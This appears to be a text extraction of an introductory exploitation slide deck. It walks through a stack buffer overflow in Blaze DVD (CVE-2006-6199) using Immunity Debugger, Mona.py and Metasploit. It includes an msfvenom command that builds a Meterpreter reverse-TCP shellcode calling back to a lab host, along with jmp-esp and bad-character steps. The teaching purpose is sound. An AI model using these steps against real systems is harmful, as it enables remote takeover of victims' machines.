exploiting 101
TRANSCRIPT
2
§ Exploiting: The art of take advantage of software vulnerabilities.
3
−Stack Buffer Overflow
§ Integer Overflow§Off-by-one
−Heap Overflow
§Use after free
§Double Free
−Memory Leaks§Format String
4
5
−General Purpose: EAX,EBX, ECX, EDX
−Intruction Pointer: EIP−Frame Pointer: EBP
−Stack Pointer: ESP
66
Main ParametersSaved EIPSaved EBP
P1 (4 bytes)
P2 (16 bytes)
High Address
Low Address
source (4 bytes)
dest (4 bytes)
Saved EIPSaved EBP
EBP, ESP
Mai
nst
ack
fram
eC
op
yDat
aS
tack
Fra
me
7
§ Intel AT&T
−
8
§ FastCall
− Use ECX and EDX to pass arguments. (from left to right)
− The rest of them through the stack. (from right to left)
§ Cdecl
− Arguments are passed on the stack. (from right to left)
− Used on C and C++.
− EAX, ECX, and EDX are caller-saved
− The rest are callee-saved.− The callee remove arguments from frame.
§ StdCall
− Callee is responsible for cleaning up the stack
− Parameters are pushed onto the stack in right-to-left order
− Used by Win32 Api Calls.
9
Main ParametersSaved EIPSaved EBP
Modified (4 bytes)
P2 (16 bytes)
High Address
Low Address
source (4 bytes)
dest (4 bytes)
Saved EIPSaved EBP
EBP, ESP
Mai
nst
ack
fram
eC
op
yDat
aS
tack
Fra
me
10
11
12
13
Blaze DVD 6.2 (Latest version)http://www.blazevideo.com/dvd-player/
CVE-2006-6199File format Vulnerability with RCE via a Stack-Overflow.http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6199
14
ASLR DEP Stack-cookie
15
!mona config -set workingfolder C:\Documents and Settings\test\Escritorio\Mona_results
Mona.py
16
Immunity Debugger
17
Metasploit
18
Mona.py
19
Log data, item 21Address=7C874413Message= 0x7c874413 : "jmp esp" | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase:
False, SafeSEH: True, OS: True, v5.1.2600.5781 (C:\WINDOWS\system32\kernel32.dll)
Memory info:https://msdn.microsoft.com/es-es/library/windows/desktop/aa366786(v=vs.85).aspx
20
./msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcpLHOST=172.16.192.1 LPORT=4444 -b '\x00\x0a\x1a' –f perl -o ~/Exploiting/Blaze\ DVD\ Example/shellcode_perl.pl
21
Badchars: Every byte that could break the shellcode.
With Mona.py1. Obtain a badchar array:
1. !mona bytearray -b '\x00’2. Execute the exploit with the array as a shellcode.3. Compare memory
1. !mona compare -f C:\Documents and Settings\test\Escritorio\Mona_results\bytearray
22
Trash_1• Separating ESP from Shellcode.• SUB ESP,20 = \x83\xec\x14
With Radare
High Address
Low Address
Shellcode
Trash_2
EIP
EIPESP - 20
23
Executing Codewith Metasploit
24
Woot!
25